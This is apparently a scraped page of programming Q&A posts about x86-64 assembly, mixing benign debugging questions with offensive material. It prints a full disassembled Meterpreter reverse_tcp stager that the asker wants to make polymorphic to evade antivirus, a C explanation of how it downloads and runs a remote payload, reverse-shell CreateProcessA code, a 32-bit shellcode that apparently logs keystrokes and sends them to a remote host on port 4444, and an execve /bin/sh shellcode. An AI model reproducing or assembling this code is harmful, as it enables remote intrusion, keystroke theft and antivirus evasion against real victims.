X64 ASSEMBLY - Cannot run compiled and linked raw shellcode in Windows - windows

After using metasploit's windows/x64/meterpreter/reverse_tcp shellcode on my windows 10 machine (with AVs turned off), I decided to try to create a hand-made polymorphic, null-free and custom-encoded version of the same shellcode (with the hope of evading my AVs).
To test my work flow, I produced a raw output of the shellcode using:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -a x64 --platform windows LHOST='my IP address' | ndisasm -b 64 -
global _start
section .text
_start:
cld
and rsp,byte -0x10
call first_call ;dword 0xd6
push r9
push r8
push rdx
push rcx
push rsi
xor rdx,rdx
mov rdx,[gs:rdx+0x60]
mov rdx,[rdx+0x18]
mov rdx,[rdx+0x20]
fifth_jmp:
mov rsi,[rdx+0x50]
movzx rcx,word [rdx+0x4a]
xor r9,r9
xor rax,rax
lodsb
cmp al,0x61
jl 0x37
sub al,0x20
ror r9d,0xd
add r9d,eax
loop 0x2d
push rdx
push r9
mov rdx,[rdx+0x20]
mov eax,[rdx+0x3c]
add rax,rdx
cmp word [rax+0x18],0x20b
jnz first_jmp ;dword 0xcb
mov eax,[rax+0x88]
test rax,rax
jz first_jmp ;0xcb
add rax,rdx
push rax
mov ecx,[rax+0x18]
mov r8d,[rax+0x20]
add r8,rdx
fourth_jmp:
jrcxz second_jmp ;0xca
dec rcx
mov esi,[r8+rcx*4]
add rsi,rdx
xor r9,r9
third_jmp:
xor rax,rax
lodsb
ror r9d,0xd
add r9d,eax
cmp al,ah
jnz third_jmp
add r9,[rsp+0x8]
cmp r9d,r10d
jnz fourth_jmp ;0x72
pop rax
mov r8d,[rax+0x24]
add r8,rdx
mov cx,[r8+rcx*2]
mov r8d,[rax+0x1c]
add r8,rdx
mov eax,[r8+rcx*4]
add rax,rdx
pop r8
pop r8
pop rsi
pop rcx
pop rdx
pop r8
pop r9
pop r10
sub rsp,byte +0x20
push r10
jmp rax
second_jmp:
pop rax
first_jmp:
pop r9
pop rdx
mov rdx,[rdx]
jmp dword fifth_jmp ;0x21
first_call:
pop rbp
mov r14,0x32335f327377
push r14
mov r14,rsp
sub rsp,0x1a0
mov r13,rsp
mov r12,0x6900a8c05c110002
push r12
mov r12,rsp
mov rcx,r14
mov r10d,0x726774c
call rbp
mov rdx,r13
push dword 0x101
pop rcx
mov r10d,0x6b8029
call rbp
push byte +0x5
pop r14
ninth_jmp:
push rax
push rax
xor r9,r9
xor r8,r8
inc rax
mov rdx,rax
inc rax
mov rcx,rax
mov r10d,0xe0df0fea
call rbp
mov rdi,rax
sixth_jmp:
push byte +0x10
pop r8
mov rdx,r12
mov rcx,rdi
mov r10d,0x6174a599
call rbp
test eax,eax
jz 0x15e
dec r14
jnz sixth_jmp ;0x13e
call second_call ;dword 0x1f1
sub rsp,byte +0x10
mov rdx,rsp
xor r9,r9
push byte +0x4
pop r8
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jng seventh_jmp ;0x1d1
add rsp,byte +0x20
pop rsi
mov esi,esi
push byte +0x40
pop r9
push dword 0x1000
pop r8
mov rdx,rsi
xor rcx,rcx
mov r10d,0xe553a458
call rbp
mov rbx,rax
mov r15,rax
tenth_jmp:
xor r9,r9
mov r8,rsi
mov rdx,rbx
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jnl eighth_jmp ;0x1e3
pop rax
push r15
pop rcx
push dword 0x4000
pop r8
push byte +0x0
pop rdx
mov r10d,0x300f2f0b
call rbp
seventh_jmp:
push rdi
pop rcx
mov r10d,0x614d6e75
call rbp
dec r14
jmp ninth_jmp ;0x11f
eighth_jmp:
add rbx,rax
sub rsi,rax
test rsi,rsi
jnz tenth_jmp ;0x1a2
jmp r15
second_call:
pop rax
push byte +0x0
pop rcx
mov r10,0x56a2b5f0
call rbp
Before making any changes to the ndisasm output (apart from modifying the call and jmp destinations from relative addresses to labels, see code above), I compiled and linked the output using:
nasm -f win64 -o meterpreter_reverse_tcp.o meterpreter_reverse_tcp.asm
/opt/mingw/x86_64-w64-mingw32/bin/ld -o meterpreter_reverse_tcp.exe meterpreter_reverse_tcp.o
But when I ran the .exe on my windows 10 machine, I got the following error:
Meterpreter_reverse_tcp.exe has stopped working. A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
The output of the command 'file meterpreter_reverse_tcp.exe' is:
meterpreter_reverse_tcp.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
What did I do wrong ?

your shell code if convert it to c/c++ is next:
LoadLibraryA("ws2_32");
WSADATA wd;
WSAStartup(MAKEWORD(1,1), &wd);
loop:
SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
SOCKADDR_IN sa = { AF_INET, _byteswap_ushort(4444) };
sa.sin_addr.s_addr = IP(192, 168, 0, 105);
// try 5 times connect to 192.168.0.105
int n = 5;
do
{
if (connect(s, (sockaddr*)&sa, sizeof(SOCKADDR_IN)) == NOERROR)
{
// we connected
break;
}
} while (--n);
ExitProcess(0);// !! error in shellcode or special damaged ?
ULONG len;
// get the length of shellcode
if (0 < recv(s, (char*)&len, sizeof(len), 0))
{
// allocate buffer for shellcode
PVOID pv = VirtualAlloc(0, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* buf = (char*)pv;
// download shellcode in loop
do
{
if (0 > (n = recv(s, buf, len, 0)))
{
// download fail
// bug !!
// must be MEM_RELEASE for free memory, but used MEM_DECOMMIT in code.
VirtualFree(pv, 0, MEM_DECOMMIT);
closesocket(s);
goto loop;
}
} while (buf += n, len -= n);
// all shellcode downloaded
// call it
((FARPROC)pv)();
}
ExitProcess(0);
it i be say worked under debugger. if something not worked for you - debug it. especially put bp on jmp rax - the begin of shell code is function which search for exported api (by hash) and call it (jmp rax)

Related

when writing 64bit reverse shell in assembly got stuck at createrprocessA api

hello i am writing windows 64bit reverse shell in assembly and after gett connected to the targetmachine ip, i want to create process to spwan a shell, fistly i try to write startinfo struct for createprocess api, but after then i pass all the parameters to the function but it doesn't work, and here is full code https://pastebin.com/6Ft2jCMX
;STARTUPINFOA+PROCESS_INFORMATION
;----------------------------------
push byte 0x12 ; We want to place (18 * 4) = 72 null bytes onto the stack
pop rcx ; Set ECX for the loop
xor r11,r11
push_loop:
push r11 ; push a null dword
loop push_loop ; keep looping untill we have pushed enough nulls
lea r12,[rsp]
mov dl,104
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
xor rdx,rdx
mov dl,255
inc rdx
mov [r12+0x3c],edx
mov [r12+0x50],r14 ; HANDLE hStdInput;
mov [r12+0x58],r14 ; HANDLE hStdOutput;
mov [r12+0x60],r14 ;HANDLE hStdError;
;createprocessA_calling
sub rsp, 0x70
push 'cmdA'
mov [rsp+3],byte dl
lea rdx,[rsp]
inc rcx
mov [rsp+32],rcx
xor rcx,rcx
xor r8,r8
mov [rsp+40],r8
mov [rsp+48],r8
mov [rsp+56],r8
lea r9,[r12]
mov [rsp+64],r9
lea r9,[r12+104]
mov [rsp+72],r9
xor r9,r9
call rbx ;createprocessA
so at last when i call the createprocessA it got stuck

Reversing an array and printing it in x86-64

I am trying to print an array, reverse it, and then print it again. I manage to print it once. I can also make 2 consecutive calls to _printy and it works. But the code breaks with the _reverse function. It does not segfault, it exits with code 24 (I looked online but this seems to mean that the maximum number of file descriptors has been exceeded, and I cannot get what this means in this context). I stepped with a debugger and the loop logic seems to make sense.
I am not passing the array in RDI, because _printy restores the content of that register when it exits. I also tried to load it directly into RDI before calling _reverse but that does not solve the problem.
I cannot figure out what the problem is. Any idea?
BITS 64
DEFAULT REL
; -------------------------------------
; -------------------------------------
; PRINT LIST
; -------------------------------------
; -------------------------------------
%define SYS_WRITE 0x02000004
%define SYS_EXIT 0x02000001
%define SYS_OPEN 0x02000005
%define SYS_CLOSE 0x02000006
%define SYS_READ 0x02000003
%define EXIT_SUCCESS 0
%define STDOUT 1
%define LF 10
%define INT_OFFSET 48
section .text
extern _printf
extern _puts
extern _exit
global _main
_main:
push rbp
lea rdi, [rel array]
call _printy
call _reverse
call _printy
pop rbp
call _exit
_reverse:
push rbp
lea rsi, [rdi + 4 * (length - 1) ]
.LOOP2:
cmp rdi, rsi
jge .DONE2
mov r8, [rdi]
mov r9, [rsi]
mov [rdi], r9
mov [rsi], r8
add rdi,4
sub rsi,4
jmp .LOOP2
.DONE2:
xor rax, rax
lea rdi, [rel array]
pop rbp
ret
_printy:
push rbp
xor rcx, rcx
mov r8, rdi
.loop:
cmp rcx, length
jge .done
push rcx
push r8
lea rdi, [rel msg]
mov rsi, [r8 + rcx * 4]
xor rax, rax
call _printf
pop r8
pop rcx
add rcx, 1
jmp .loop
.done:
xor rax, rax
lea rdi, [rel array]
pop rbp
ret
section .data
array: dd 78, 2, 3, 4, 5, 6
length: equ ($ - array) / 4
msg: db "%d => ", 0
Edit with some info from the debugger
Stepping into the _printy function gives the following msg, once reaching the call to _printf.
* thread #1, queue = 'com.apple.main-thread', stop reason = step over failed (Could not create return address breakpoint.)
frame #0: 0x0000000100003f8e a.out`printf
a.out`printf:
-> 0x100003f8e <+0>: jmp qword ptr [rip + 0x4074] ; (void *)0x00007ff80258ef0b: printf
0x100003f94: lea r11, [rip + 0x4075] ; _dyld_private
0x100003f9b: push r11
0x100003f9d: jmp qword ptr [rip + 0x5d] ; (void *)0x00007ff843eeb520: dyld_stub_binder
I am not an expert, but a quick research online led to the following
During the 'thread step-out' command, check that the memory we are about to place a breakpoint in is executable. Previously, if the current function had a nonstandard stack layout/ABI, and had a valid data pointer in the location where the return address is usually located, data corruption would occur when the breakpoint was written. This could lead to an incorrectly reported crash or silent corruption of the program's state. Now, if the above check fails, the command safely aborts.
So after all this might not be a problem (I am also able to track the execution of the printf call). But this is really the only understandable piece of information I am able to extract from the debugger. Deep in some quite obscure (to me) function calls I reach this
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
frame #0: 0x00007ff80256db7f libsystem_c.dylib`flockfile + 10
libsystem_c.dylib`flockfile:
-> 0x7ff80256db7f <+10>: call 0x7ff8025dd480 ; symbol stub for: __error
0x7ff80256db84 <+15>: mov r14d, dword ptr [rax]
0x7ff80256db87 <+18>: mov rdi, qword ptr [rbx + 0x68]
0x7ff80256db8b <+22>: add rdi, 0x8
Target 0: (a.out) stopped.
(lldb)
Process 61913 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
frame #0: 0x00007ff8025dd480 libsystem_c.dylib`__error
This is one of the function calls happening in _printf.
Ask further questions if there is something more I can do.
Your array consists of int32 numbers aka dd in nasm terminology, but your swap operates on 64 bit numbers:
mov r8, [rdi]
mov r9, [rsi]
mov [rdi], r9
mov [rsi], r8
Assuming you were not after some crazy optimizations where you swap a pair of elements simultaneously you want this to remain in 32 bits:
mov r8d, [rdi]
mov r9d, [rsi]
mov [rdi], r9d
mov [rsi], r8d

Segmentation fault after function call in x86 assembly

I'm currently writing a compiler and I have created some tests and only one of them fails with Segmentation fault (core dumped) as error message.
This is the code that gets compiled
function main(): int {
var f: int = 10;
return func(f) - func(f / 2);
}
function func(a: int): int {
return a;
}
And this is the generated assembly code (it's not really optimized as you can see)
section .text
global _start
_start:
call function_main
mov rdi, rax
mov rax, 60
syscall
global function_main
function_main:
push rbp
mov rbp, rsp
sub rsp, 4
mov rax, 10
mov DWORD[rbp-0], eax
mov eax, DWORD[rbp-0]
mov rdi, rax
call function_func
push rax
mov eax, DWORD[rbp-0]
mov rbx, 2
idiv rbx
mov rdi, rax
call function_func
mov rbx, rax
pop rax
sub rax, rbx
mov rsp, rbp
pop rbp
ret
global function_func
function_func:
push rbp
mov rbp, rsp
sub rsp, 4
mov DWORD[rbp-0], edi
mov eax, DWORD[rbp-0]
mov rsp, rbp
pop rbp
ret
The assembly file is compiled with nasm -f elf64 ./test9.lv.asm -o ./test9.lv.asm.o and ld -g ./test9.lv.asm.o a.out
I've used gdb to debug the binary file and it seems like the program receives the SIGSEGV signal right after func(f) returns the first time.
But now I don't know why this is happening in this case.

How can I compile / execute the following code on Windows 7 32 Bit?

Can you tell me how I can execute this code on a windows 7 32bit machine?
Do I need to compile it? If yes, how should I do this?
Which ending (.exe) should the file have?
section .bss
section .data
section .text
global _start
_start:
cld
call dword loc_88h
pushad
mov ebp,esp
xor eax,eax
mov edx,[fs:eax+0x30]
mov edx,[edx+0xc]
mov edx,[edx+0x14]
loc_15h:
mov esi,[edx+0x28]
movzx ecx,word [edx+0x26]
xor edi,edi
loc_1eh:
lodsb
cmp al,0x61
jl loc_25h
sub al,0x20
loc_25h:
ror edi,byte 0xd
add edi,eax
loop loc_1eh
push edx
push edi
mov edx,[edx+0x10]
mov ecx,[edx+0x3c]
mov ecx,[ecx+edx+0x78]
jecxz loc_82h
add ecx,edx
push ecx
mov ebx,[ecx+0x20]
add ebx,edx
mov ecx,[ecx+0x18]
loc_45h:
jecxz loc_81h
dec ecx
mov esi,[ebx+ecx*4]
add esi,edx
xor edi,edi
loc_4fh:
lodsb
ror edi,byte 0xd
add edi,eax
cmp al,ah
jnz loc_4fh
add edi,[ebp-0x8]
cmp edi,[ebp+0x24]
jnz loc_45h
pop eax
mov ebx,[eax+0x24]
add ebx,edx
mov cx,[ebx+ecx*2]
mov ebx,[eax+0x1c]
add ebx,edx
mov eax,[ebx+ecx*4]
add eax,edx
mov [esp+0x24],eax
pop ebx
pop ebx
popad
pop ecx
pop edx
push ecx
jmp eax
loc_81h:
pop edi
loc_82h:
pop edi
pop edx
mov edx,[edx]
jmp short loc_15h
loc_88h:
pop ebp
push dword 0x3233
push dword 0x5f327377
push esp
push dword 0x726774c
call ebp
mov eax,0x190
sub esp,eax
push esp
push eax
push dword 0x6b8029
call ebp
push byte +0x10
jmp dword loc_1ceh
loc_b2h:
push dword 0x803428a9
call ebp
lea esi,[eax+0x1c]
xchg esi,esp
pop eax
xchg esp,esi
mov esi,eax
push dword 0x6c6c
push dword 0x642e7472
push dword 0x6376736d
push esp
push dword 0x726774c
call ebp
jmp dword loc_1e3h
loc_dfh:
push dword 0xd1ecd1f
call ebp
xchg ah,al
ror eax,byte 0x10
inc eax
inc eax
push esi
push eax
mov esi,esp
xor eax,eax
push eax
push eax
push eax
push eax
inc eax
inc eax
push eax
push eax
push dword 0xe0df0fea
call ebp
mov edi,eax
loc_104h:
push byte +0x10
push esi
push edi
push dword 0x6174a599
call ebp
test eax,eax
jz loc_122h
dec dword [esi+0x8]
jnz loc_104h
xor eax,eax
push eax
push dword 0x56a2b5f0
call ebp
loc_122h:
push dword 0x3233
push dword 0x72657375
push esp
push dword 0x726774c
call ebp
push dword 0x657461
push dword 0x74537965
push dword 0x4b746547
push esp
push eax
push dword 0x7802f749
call ebp
push esi
push edi
push eax
xor ecx,ecx
mov esi,ecx
mov cl,0x8
loc_155h:
push esi
loop loc_155h
loc_158h:
xor ecx,ecx
xor esi,esi
push byte +0x8
push dword 0xe035f044
call ebp
loc_165h:
mov eax,esi
cmp al,0xff
jnc loc_158h
inc esi
push esi
call dword [esp+0x24]
mov edx,esi
xor ecx,ecx
mov cl,0x80
and eax,ecx
xor ecx,ecx
cmp eax,ecx
jnz loc_18fh
xor edx,edx
mov ecx,edx
mov eax,esi
mov cl,0x20
div ecx
btr [esp+eax*4],edx
jmp short loc_165h
loc_18fh:
xor edx,edx
mov ecx,edx
mov eax,esi
mov cl,0x20
div ecx
bt [esp+eax*4],edx
jc loc_165h
xor edx,edx
mov ecx,edx
mov eax,esi
mov cl,0x20
div ecx
bts [esp+eax*4],edx
push esi
push byte +0x10
push dword [esp+0x30]
push byte +0x0
push byte +0x1
lea ecx,[esp+0x10]
push ecx
push dword [esp+0x3c]
push dword 0xdf5c9d75
call ebp
lea esp,[esp+0x4]
jmp short loc_158h
loc_1ceh:
call dword loc_b2h
db "www.example.com",0
loc_1e3h:
call dword loc_dfh
db "4444",0
This looks like 32-bit NASM assembly code(A simple beginners introduction). You can assemble it (not compile it) with this installer from the NASM website (version 2.12.02 at the time of this answer).
Assembling and linking it on Windows 7 works like this:
If you have the Microsoft C compiler, you have (somewhere) the linker from Microsoft named link.exe. If you don’t, you can download the Windows 7 SDK, which provides the C compiler and linker(link.exe).
nasm -f win32 yourProg.asm
link /entry:_start /subsystem:console yourProg.obj <locationOfYour>\kernel32.lib
But a quick glance over the code makes obvious that there are NO obviously named API calls in it, so the destination platform(Windows, Linux, MacOS, other) is difficult to determine. So this code may assemble, but its execution may(!) be useless(unless run in a debugger) nevertheless.

Loading "/bin/sh" into a register

I'm trying to write ASM code to spawn a shell.
I've figured out that the syscall number for __execve is 0x3b or 59.
I need to send "/bin/sh" as the first parameter, a pointer to {"/bin/sh", NULL} as the second parameter and NULL as the third parameter.
By the convetions of x86_64 ASM on the Intel architecture - the first parameter is written into the RDI register, the second parameter is written into the RSI register and the final parameter is written into the RDX register.
This is my code:
global _start
section .text
_start:
jmp message
mystart:
xor rax, rax
push rax
push rax
pop rdx ; third parameter - NULL
pop rdi ; first parameter - "/bin/sh"
mov rax, rdi
push rax
push rsp
pop rsi ; second parameter - pointer to {"/bin/sh", NULL}
xor rax, rax
mov al, 0x3b
syscall
xor rax, rax
mov al, 0x3c
xor rdi, rdi
mov dil, 0x0a
syscall
message:
call mystart
db "/bin/sh"
section .data
I use the following instructions to compile and link the code.
yasm -f elf64 shell.asm -o shell.o
ld -o shell.out shell.o
The GDB dump of the _start function is as follows:
Dump of assembler code for function _start:
0x0000000000400080 <+0>: jmp 0x4000a3 <_start+35>
0x0000000000400082 <+2>: xor rax,rax
0x0000000000400085 <+5>: push rax
0x0000000000400086 <+6>: push rax
0x0000000000400087 <+7>: pop rdx
0x0000000000400088 <+8>: pop rdi
0x0000000000400089 <+9>: mov rax,rdi
0x000000000040008c <+12>: push rax
0x000000000040008d <+13>: push rsp
0x000000000040008e <+14>: pop rsi
0x000000000040008f <+15>: xor rax,rax
0x0000000000400092 <+18>: mov al,0x3b
0x0000000000400094 <+20>: syscall
0x0000000000400096 <+22>: xor rax,rax
0x0000000000400099 <+25>: mov al,0x3c
0x000000000040009b <+27>: xor rdi,rdi
0x000000000040009e <+30>: mov dil,0xa
---Type <return> to continue, or q <return> to quit---
0x00000000004000a1 <+33>: syscall
0x00000000004000a3 <+35>: call 0x400082 <_start+2>
0x00000000004000a8 <+40>: pop rsp
0x00000000004000a9 <+41>: (bad)
0x00000000004000aa <+42>: (bad)
0x00000000004000ab <+43>: .byte 0x69
0x00000000004000ac <+44>: outs dx,BYTE PTR ds:[rsi]
0x00000000004000ad <+45>: pop rsp
0x00000000004000ae <+46>: (bad)
0x00000000004000af <+47>: jae 0x400119
As you can see the (bad) instructions are caused by db "/bin/sh", what is wrong with this string? What is a (bad) instruction? How do I debug such problems in the future?
① You cannot load a string into a register, only a pointer to a string.
② Your stack magic is merely wrong. Move one of the doubled push rax to just below pop rdi, and the program works for me.

Resources